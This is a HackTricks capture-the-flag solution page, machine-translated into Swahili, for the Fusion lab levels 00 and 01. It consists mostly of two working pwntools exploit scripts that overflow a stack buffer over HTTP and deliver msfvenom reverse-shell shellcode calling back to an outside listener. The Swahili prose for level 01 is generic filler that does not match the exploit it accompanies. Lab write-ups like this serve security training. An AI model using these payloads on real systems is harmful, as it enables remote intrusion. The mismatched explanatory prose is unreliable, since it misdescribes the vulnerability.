hacktricks/exploiting/linux-exploiting-basic-esp/fusion.md
2024-02-11 02:13:58 +00:00

5.4 KiB

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Level00

http://exploit-exercises.lains.space/fusion/level00/

  1. Pata kigeuzi cha kubadilisha EIP
  2. Weka anwani ya shellcode kwenye EIP
from pwn import *

r = remote("192.168.85.181", 20000)

buf = "GET "            # Needed
buf += "A"*139          # Offset 139
buf += p32(0xbffff440)  # Stack address where the shellcode will be saved
buf += " HTTP/1.1"      # Needed
buf += "\x90"*100       # NOPs

#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d"
buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b"
buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a"
buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31"
buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e"
buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41"
buf += "\x65\xd9\x0f\x01"

r.recvline()
r.send(buf)
r.interactive()

Level01

Maelezo

Katika kiwango hiki, tunatafuta njia ya kufanya uharibifu wa kudhibiti kwenye mfumo wa Fusion. Tunapata faili ya level01 ambayo inaonekana kuwa na leseni ya programu. Tunahitaji kuchunguza faili hii ili kupata habari yoyote muhimu ambayo inaweza kutusaidia kudhibiti mfumo.

Uchunguzi wa Awali

Tunapoangalia faili ya level01, tunagundua kuwa ni faili ya taratibu ya Shell. Tunaweza kuitumia kwa kuzindua amri za Shell kwenye mfumo. Kwa hivyo, tunaweza kujaribu kuzindua amri za Shell kwa kutumia faili hii.

Kuzindua Amri za Shell

Tunaweza kuzindua amri za Shell kwa kutumia faili ya level01. Tunatumia amri ifuatayo:

./level01

Kudhibiti Mfumo

Baada ya kuzindua amri za Shell, tunaweza kuanza kuchunguza mfumo na kujaribu kudhibiti. Tunaweza kutumia amri za Shell kama ls, cat, grep, nk. ili kupata habari muhimu na kuchunguza faili na directories kwenye mfumo.

Hitimisho

Kwa kutumia faili ya level01, tunaweza kuzindua amri za Shell na kuchunguza mfumo wa Fusion. Hii inatuwezesha kupata habari muhimu na kujaribu kudhibiti mfumo.

from pwn import *

r = remote("192.168.85.181", 20001)

buf = "GET "            # Needed
buf += "A"*139          # Offset 139
buf += p32(0x08049f4f)  # Adress of: JMP esp
buf += p32(0x9090E6FF)  # OPCODE: JMP esi (the esi register have the address of the shellcode)
buf += " HTTP/1.1"      # Needed
buf += "\x90"*100       # NOPs

#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d"
buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b"
buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a"
buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31"
buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e"
buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41"
buf += "\x65\xd9\x0f\x01"

r.send(buf)
r.interactive()
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: